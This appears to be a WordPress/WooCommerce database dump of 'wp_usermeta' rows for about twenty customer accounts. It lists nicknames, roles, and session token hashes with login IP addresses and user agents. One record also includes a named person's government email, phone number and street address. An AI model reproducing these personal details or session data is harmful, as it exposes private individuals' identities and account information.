INSERT INTO `wp_usermeta` VALUES (4474, 243, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4475, 244, 'nickname', 'thlewis'); 
INSERT INTO `wp_usermeta` VALUES (4476, 244, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4477, 244, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4478, 244, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4479, 244, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4480, 244, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4481, 244, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4482, 244, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4483, 244, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4484, 244, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4485, 244, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4486, 244, '_yoast_wpseo_profile_updated', '1481227269'); 
INSERT INTO `wp_usermeta` VALUES (4487, 244, 'session_tokens', 'a:1:{s:64:"973645c3b0d7b69441330282c251ceb2d8cf714b09905046fee902670cbd1760";a:4:{s:10:"expiration";i:1482436870;s:2:"ip";s:14:"128.112.85.119";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36";s:5:"login";i:1481227270;}}'); 
INSERT INTO `wp_usermeta` VALUES (4488, 245, 'nickname', 'nprice'); 
INSERT INTO `wp_usermeta` VALUES (4489, 245, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4490, 245, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4491, 245, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4492, 245, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4493, 245, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4494, 245, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4495, 245, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4496, 245, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4497, 245, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4498, 245, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4499, 245, '_yoast_wpseo_profile_updated', '1481255001'); 
INSERT INTO `wp_usermeta` VALUES (4500, 245, 'session_tokens', 'a:1:{s:64:"9574f8acff3db0e07bc955bf54708501e5279debe4064ca126ed2195a764f967";a:4:{s:10:"expiration";i:1482464602;s:2:"ip";s:12:"182.71.39.42";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1481255002;}}'); 
INSERT INTO `wp_usermeta` VALUES (4501, 246, 'nickname', 'alfreda.r.luster'); 
INSERT INTO `wp_usermeta` VALUES (4502, 246, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4503, 246, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4504, 246, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4505, 246, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4506, 246, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4507, 246, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4508, 246, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4509, 246, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4510, 246, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4511, 246, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4512, 246, '_yoast_wpseo_profile_updated', '1481398464'); 
INSERT INTO `wp_usermeta` VALUES (4513, 246, 'session_tokens', 'a:1:{s:64:"2664da304df9bde422364d0a3989421d7df99ebf76f230f5575e39a31df2eab5";a:4:{s:10:"expiration";i:1482608066;s:2:"ip";s:13:"162.58.82.135";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36";s:5:"login";i:1481398466;}}'); 
INSERT INTO `wp_usermeta` VALUES (4514, 246, 'billing_first_name', 'Alfreda'); 
INSERT INTO `wp_usermeta` VALUES (4515, 246, 'billing_last_name', 'Luster'); 
INSERT INTO `wp_usermeta` VALUES (4516, 246, 'billing_company', 'Federal Aviation Admin'); 
INSERT INTO `wp_usermeta` VALUES (4517, 246, 'billing_email', 'alfreda.r.luster@faa.gov'); 
INSERT INTO `wp_usermeta` VALUES (4518, 246, 'billing_phone', '405-954-5534'); 
INSERT INTO `wp_usermeta` VALUES (4519, 246, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (4520, 246, 'billing_address_1', '6500 S MacArthur Blvd'); 
INSERT INTO `wp_usermeta` VALUES (4521, 246, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (4522, 246, 'billing_city', 'Oklahoma City'); 
INSERT INTO `wp_usermeta` VALUES (4523, 246, 'billing_state', 'OK'); 
INSERT INTO `wp_usermeta` VALUES (4524, 246, 'billing_postcode', '73169'); 
INSERT INTO `wp_usermeta` VALUES (4525, 247, 'nickname', 'kay.armstrong'); 
INSERT INTO `wp_usermeta` VALUES (4526, 247, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4527, 247, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4528, 247, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4529, 247, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4530, 247, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4531, 247, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4532, 247, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4533, 247, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4534, 247, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4535, 247, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4536, 247, '_yoast_wpseo_profile_updated', '1481554886'); 
INSERT INTO `wp_usermeta` VALUES (4537, 247, 'session_tokens', 'a:1:{s:64:"05b1869c6d7100776dbeb4f99f1cd54ce0b0cda435482bc5812a048d756c60e9";a:4:{s:10:"expiration";i:1482764487;s:2:"ip";s:14:"134.132.52.220";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481554887;}}'); 
INSERT INTO `wp_usermeta` VALUES (4538, 247, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4539, 248, 'nickname', 'vjgiammaria'); 
INSERT INTO `wp_usermeta` VALUES (4540, 248, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4541, 248, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4542, 248, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4543, 248, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4544, 248, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4545, 248, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4546, 248, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4547, 248, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4548, 248, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4549, 248, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4550, 248, '_yoast_wpseo_profile_updated', '1481579274'); 
INSERT INTO `wp_usermeta` VALUES (4551, 248, 'session_tokens', 'a:1:{s:64:"1be36b66447001760159d6c8f2aa02dacb622a0e6ff6c5c0ebd0740cd2b7ff09";a:4:{s:10:"expiration";i:1482788875;s:2:"ip";s:13:"152.132.11.65";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481579275;}}'); 
INSERT INTO `wp_usermeta` VALUES (4552, 249, 'nickname', 'henry_huppert'); 
INSERT INTO `wp_usermeta` VALUES (4553, 249, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4554, 249, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4555, 249, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4556, 249, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4557, 249, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4558, 249, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4559, 249, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4560, 249, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4561, 249, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4562, 249, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4563, 249, '_yoast_wpseo_profile_updated', '1481637970'); 
INSERT INTO `wp_usermeta` VALUES (4564, 249, 'session_tokens', 'a:1:{s:64:"06b80c7331e9b4013343ce03431eaa568ea0c57bc1121bda034f5de2adfbf2a2";a:4:{s:10:"expiration";i:1500046230;s:2:"ip";s:14:"128.148.231.12";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1499873430;}}'); 
INSERT INTO `wp_usermeta` VALUES (4565, 250, 'nickname', 'ddigenov'); 
INSERT INTO `wp_usermeta` VALUES (4566, 250, 'first_name', 'Don'); 
INSERT INTO `wp_usermeta` VALUES (4567, 250, 'last_name', 'DiGenova'); 
INSERT INTO `wp_usermeta` VALUES (4568, 250, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4569, 250, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4570, 250, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4571, 250, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4572, 250, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4573, 250, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4574, 250, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4575, 250, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4576, 250, '_yoast_wpseo_profile_updated', '1481641253'); 
INSERT INTO `wp_usermeta` VALUES (4577, 250, 'session_tokens', 'a:1:{s:64:"4d93925043f68052014cd3bd7bbc6e4bbf2212897be574068427ff2abaaa8ff4";a:4:{s:10:"expiration";i:1482850854;s:2:"ip";s:13:"74.113.53.162";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481641254;}}'); 
INSERT INTO `wp_usermeta` VALUES (4578, 250, 'last_update', '1481641279'); 
INSERT INTO `wp_usermeta` VALUES (4579, 251, 'nickname', 'patrick.besana'); 
INSERT INTO `wp_usermeta` VALUES (4580, 251, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4581, 251, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4582, 251, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4583, 251, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4584, 251, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4585, 251, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4586, 251, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4587, 251, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4588, 251, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4589, 251, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4590, 251, '_yoast_wpseo_profile_updated', '1481643290'); 
INSERT INTO `wp_usermeta` VALUES (4591, 251, 'session_tokens', 'a:1:{s:64:"54ab8bcf6058852b6aa575d5ba08bd31ec17679b797e7be33ac5af4ee02be544";a:4:{s:10:"expiration";i:1482852891;s:2:"ip";s:14:"192.249.47.179";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481643291;}}'); 
INSERT INTO `wp_usermeta` VALUES (4592, 252, 'nickname', 'cristina.cavalheiro'); 
INSERT INTO `wp_usermeta` VALUES (4593, 252, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4594, 252, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4595, 252, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4596, 252, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4597, 252, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4598, 252, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4599, 252, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4600, 252, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4601, 252, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4602, 252, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4603, 252, '_yoast_wpseo_profile_updated', '1481651227'); 
INSERT INTO `wp_usermeta` VALUES (4604, 252, 'session_tokens', 'a:1:{s:64:"aa3ab0073df47db37faa8ba528ada06efc58236180ec6d89c17bcbeabdefd6d5";a:4:{s:10:"expiration";i:1482860828;s:2:"ip";s:15:"198.169.189.229";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1481651228;}}'); 
INSERT INTO `wp_usermeta` VALUES (4605, 253, 'nickname', 'rflores'); 
INSERT INTO `wp_usermeta` VALUES (4606, 253, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4607, 253, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4608, 253, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4609, 253, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4610, 253, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4611, 253, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4612, 253, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4613, 253, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4614, 253, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4615, 253, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4616, 253, '_yoast_wpseo_profile_updated', '1481652840'); 
INSERT INTO `wp_usermeta` VALUES (4617, 253, 'session_tokens', 'a:1:{s:64:"3f315c173189a695f61475ad38cb832a7e55bd9bd2dd1516c89ea06e5b4abbc5";a:4:{s:10:"expiration";i:1482862441;s:2:"ip";s:12:"98.172.73.60";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1481652841;}}'); 
INSERT INTO `wp_usermeta` VALUES (4618, 253, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4619, 254, 'nickname', 'jschellenberg'); 
INSERT INTO `wp_usermeta` VALUES (4620, 254, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4621, 254, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4622, 254, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4623, 254, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4624, 254, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4625, 254, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4626, 254, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4627, 254, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4628, 254, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4629, 254, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4630, 254, '_yoast_wpseo_profile_updated', '1481686632'); 
INSERT INTO `wp_usermeta` VALUES (4631, 254, 'session_tokens', 'a:1:{s:64:"f3e2472e86a054482cf2007acbbbec8292175b6b1228eab88c519db298f4a2ae";a:4:{s:10:"expiration";i:1482896233;s:2:"ip";s:14:"73.246.191.202";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481686633;}}'); 
INSERT INTO `wp_usermeta` VALUES (4632, 255, 'nickname', 'avi'); 
INSERT INTO `wp_usermeta` VALUES (4633, 255, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4634, 255, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4635, 255, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4636, 255, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4637, 255, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4638, 255, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4639, 255, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4640, 255, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4641, 255, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4642, 255, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4643, 255, '_yoast_wpseo_profile_updated', '1481717013'); 
INSERT INTO `wp_usermeta` VALUES (4644, 255, 'session_tokens', 'a:1:{s:64:"fe11d4ab43f0ab5cef7a8f243d144a2f630da587bbad1227f669d003db173608";a:4:{s:10:"expiration";i:1482926614;s:2:"ip";s:14:"82.102.165.200";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1481717014;}}'); 
INSERT INTO `wp_usermeta` VALUES (4645, 256, 'nickname', 'jmcardle'); 
INSERT INTO `wp_usermeta` VALUES (4646, 256, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4647, 256, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4648, 256, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4649, 256, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4650, 256, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4651, 256, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4652, 256, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4653, 256, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4654, 256, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4655, 256, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4656, 256, '_yoast_wpseo_profile_updated', '1481721157'); 
INSERT INTO `wp_usermeta` VALUES (4657, 256, 'session_tokens', 'a:1:{s:64:"469ac0990a0a37ab25f9afceacf3bc6bc2ad3e04f172c3caf946e1ee0a21980a";a:4:{s:10:"expiration";i:1482930760;s:2:"ip";s:11:"69.164.70.8";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481721160;}}'); 
INSERT INTO `wp_usermeta` VALUES (4658, 256, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4659, 257, 'nickname', 'jkostuch'); 
INSERT INTO `wp_usermeta` VALUES (4660, 257, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4661, 257, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4662, 257, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4663, 257, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4664, 257, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4665, 257, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4666, 257, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4667, 257, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4668, 257, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4669, 257, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4670, 257, '_yoast_wpseo_profile_updated', '1481726723'); 
INSERT INTO `wp_usermeta` VALUES (4671, 257, 'session_tokens', 'a:1:{s:64:"5da3c5eb88468d0773bdf579bffd0fe7ca12a83b334b8d732ccb568effe45a98";a:4:{s:10:"expiration";i:1484247457;s:2:"ip";s:11:"12.175.12.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484074657;}}'); 
INSERT INTO `wp_usermeta` VALUES (4672, 258, 'nickname', 'dyoung'); 
INSERT INTO `wp_usermeta` VALUES (4673, 258, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4674, 258, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4675, 258, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4676, 258, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4677, 258, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4678, 258, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4679, 258, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4680, 258, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4681, 258, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4682, 258, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4683, 258, '_yoast_wpseo_profile_updated', '1481736709'); 
INSERT INTO `wp_usermeta` VALUES (4684, 258, 'session_tokens', 'a:1:{s:64:"d14bbcd26438fe6eed8b659886a87f55f68fd478892e870e8b450fb9814d4ac9";a:4:{s:10:"expiration";i:1482946310;s:2:"ip";s:11:"24.113.41.8";s:2:"ua";s:127:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586";s:5:"login";i:1481736710;}}'); 
INSERT INTO `wp_usermeta` VALUES (4685, 259, 'nickname', 'sknowlton'); 
INSERT INTO `wp_usermeta` VALUES (4686, 259, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4687, 259, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4688, 259, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4689, 259, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4690, 259, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4691, 259, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4692, 259, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4693, 259, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4694, 259, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4695, 259, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4696, 259, '_yoast_wpseo_profile_updated', '1481738810'); 
INSERT INTO `wp_usermeta` VALUES (4697, 259, 'session_tokens', 'a:1:{s:64:"ef3b51e521fd5dcaa9a5e179777d42ce67e864b9044b942689cabcb79a6eb1a2";a:4:{s:10:"expiration";i:1482948411;s:2:"ip";s:12:"66.215.6.242";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1481738811;}}'); 
INSERT INTO `wp_usermeta` VALUES (4698, 260, 'nickname', 'stefanie'); 
INSERT INTO `wp_usermeta` VALUES (4699, 260, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4700, 260, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4701, 260, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4702, 260, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4703, 260, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4704, 260, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4705, 260, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4706, 260, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4707, 260, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4708, 260, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4709, 260, '_yoast_wpseo_profile_updated', '1481819843'); 
INSERT INTO `wp_usermeta` VALUES (4710, 260, 'session_tokens', 'a:1:{s:64:"8571c96ef8370d0a8979566dc234f56bd1d0c56204b67e7950dea836e94c3ee9";a:4:{s:10:"expiration";i:1483029444;s:2:"ip";s:11:"50.32.32.69";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1481819844;}}'); 
INSERT INTO `wp_usermeta` VALUES (4711, 261, 'nickname', 'mlopez03'); 
INSERT INTO `wp_usermeta` VALUES (4712, 261, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4713, 261, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4714, 261, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4715, 261, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4716, 261, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4717, 261, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4718, 261, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4719, 261, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4720, 261, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4721, 261, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4722, 261, '_yoast_wpseo_profile_updated', '1481821584'); 
INSERT INTO `wp_usermeta` VALUES (4723, 261, 'session_tokens', 'a:1:{s:64:"dc44cfcee3291a6160faa4c4f5b44ca08489dafd2250697d22918106976e58bc";a:4:{s:10:"expiration";i:1483031185;s:2:"ip";s:14:"136.251.226.45";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481821585;}}'); 
INSERT INTO `wp_usermeta` VALUES (4724, 262, 'nickname', 'gclark'); 
INSERT INTO `wp_usermeta` VALUES (4725, 262, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4726, 262, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4727, 262, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4728, 262, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4729, 262, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4730, 262, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4731, 262, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4732, 262, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4733, 262, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4734, 262, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4735, 262, '_yoast_wpseo_profile_updated', '1481829730'); 
